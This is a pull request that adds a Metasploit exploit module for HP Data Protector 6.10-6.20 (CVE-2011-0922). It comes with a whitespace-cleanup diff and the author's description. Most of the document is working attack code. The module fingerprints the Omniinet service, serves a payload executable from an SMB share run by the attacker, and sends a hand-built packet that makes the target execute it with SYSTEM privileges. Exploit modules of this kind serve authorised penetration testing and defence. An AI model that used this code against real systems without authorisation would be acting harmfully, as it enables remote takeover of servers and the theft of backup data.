### PR TITLE
Remote SYSTEM Exploit for 6.10-6.20 Data Protector

### DIFF
--- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
@@ -1,0 +1,161 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'HP Data Protector 6.10/6.11/6.20 Install Service',
+      'Description'    => %q{
+        This module exploits HP Data Protector Omniinet process on Windows only. 
+        This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable. 
+        To ensure this works, the SMB server created in MSF must have a share called Omniback which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\
+      },
+      'Author'         => [
+        'Ben Turner',
+      ],
+      'References'     =>
+        [
+          ['CVE', '2011-0922'],
+          ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Privileged'     => true,
+      'Platform'       => 'win',
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
+      'Targets'        =>
+        [
+          [ 'HP Data Protector 6.10/6.11/6.20 / Windows', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 02 2011'))
+
+      register_options(
+        [
+          Opt::RPORT(5555),
+          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
+        ], self.class)
+
+      deregister_options('FOLDER_NAME')
+      deregister_options('FILE_CONTENTS')
+      deregister_options('SHARE')
+      deregister_options('FILE_NAME')
+  end
+
+  def peer  
+    "#{rhost}:#{rport}"  
+  end 
+
+  def check
+    fingerprint = get_fingerprint
+
+    if fingerprint.nil?
+      return Exploit::CheckCode::Unknown
+    end
+
+    print_status("#{peer} - #{fingerprint}")
+
+    if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    if minor < 11
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Detected
+  end
+
+  def get_fingerprint
+    ommni = connect
+    ommni.put(rand_text_alpha_upper(64))
+    resp = ommni.get_once(-1)
+    disconnect
+
+    if resp.nil?
+      return nil
+    end
+
+    Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
+  end
+
+  def primer
+    self.file_contents = generate_payload_exe
+    self.file_name = "installservice.exe"
+    self.share = "Omniback\\i386"
+
+    vprint_status("File available on #{unc}...")
+    vprint_status("#{peer} - Trying to execute remote EXE...")
+
+    lhost = "#{datastore['SRVHOST']}"
+    lhostfull = ""
+    lhost.each_char do |character|
+      lhostfull = lhostfull << "\x00" << character
+    end
+
+    shellcode = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
+    shellcode << lhostfull 
+    shellcode << "\x00\x00\x00\x20\x00\x30\x00"
+    shellcode << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
+    shellcode << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
+    shellcode << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
+    shellcode << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
+    shellcode << "\x5c"
+    shellcode << lhostfull 
+    shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
+    shellcode << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
+    shellcode << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
+    shellcode << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
+    shellcode << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
+    shellcode << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
+    shellcode << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
+    shellcode << lhostfull 
+    shellcode << "\x5c\x00\x5c\x00\x4f\x00"
+    shellcode << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
+    shellcode << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
+    shellcode << "\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
+    shellcode << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
+    shellcode << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
+    shellcode << "\x5c\x00\x5c"
+    shellcode << lhostfull 
+    shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
+    shellcode << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
+    shellcode << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
+    shellcode << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
+    shellcode << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
+    shellcode << lhostfull 
+    shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
+    shellcode << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
+
+    connect()
+    sock.put(shellcode)
+    disconnect
+  end 
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['SMB_DELAY']) {super}
+    rescue Timeout::Error
+      # Stop SMB Server
+    end
+  end
+end

--- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
@@ -16,8 +16,8 @@ class Metasploit4 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'HP Data Protector 6.10/6.11/6.20 Install Service',
       'Description'    => %q{
-        This module exploits HP Data Protector Omniinet process on Windows only. 
-        This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable. 
+        This module exploits HP Data Protector Omniinet process on Windows only.
+        This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable.
         To ensure this works, the SMB server created in MSF must have a share called Omniback which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\
       },
       'Author'         => [
@@ -59,9 +59,9 @@ class Metasploit4 < Msf::Exploit::Remote
       deregister_options('FILE_NAME')
   end
 
-  def peer  
-    "#{rhost}:#{rport}"  
-  end 
+  def peer
+    "#{rhost}:#{rport}"
+  end
 
   def check
     fingerprint = get_fingerprint
@@ -113,14 +113,14 @@ class Metasploit4 < Msf::Exploit::Remote
     end
 
     shellcode = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
-    shellcode << lhostfull 
+    shellcode << lhostfull
     shellcode << "\x00\x00\x00\x20\x00\x30\x00"
     shellcode << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
     shellcode << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
     shellcode << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
     shellcode << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
     shellcode << "\x5c"
-    shellcode << lhostfull 
+    shellcode << lhostfull
     shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
     shellcode << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
     shellcode << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
@@ -128,7 +128,7 @@ class Metasploit4 < Msf::Exploit::Remote
     shellcode << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
     shellcode << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
     shellcode << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
-    shellcode << lhostfull 
+    shellcode << lhostfull
     shellcode << "\x5c\x00\x5c\x00\x4f\x00"
     shellcode << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
     shellcode << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
@@ -136,20 +136,20 @@ class Metasploit4 < Msf::Exploit::Remote
     shellcode << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
     shellcode << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
     shellcode << "\x5c\x00\x5c"
-    shellcode << lhostfull 
+    shellcode << lhostfull
     shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
     shellcode << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
     shellcode << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
     shellcode << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
     shellcode << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
-    shellcode << lhostfull 
+    shellcode << lhostfull
     shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
     shellcode << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
 
     connect()
     sock.put(shellcode)
     disconnect
-  end 
+  end
 
   def exploit
     begin


### PR DESCRIPTION
New module to exploit the Install Service vulnerability inside data protector. I released this vulnearbility on exploit DB some years back but Metasploit didnt support setting up a SMB server at the time. I have re-submitted this module to exploit the vulnerability. I have tested this on Windows Server 2003 and it works without fail.

https://www.exploit-db.com/exploits/19288/ 

https://www.exploit-db.com/exploits/27271/
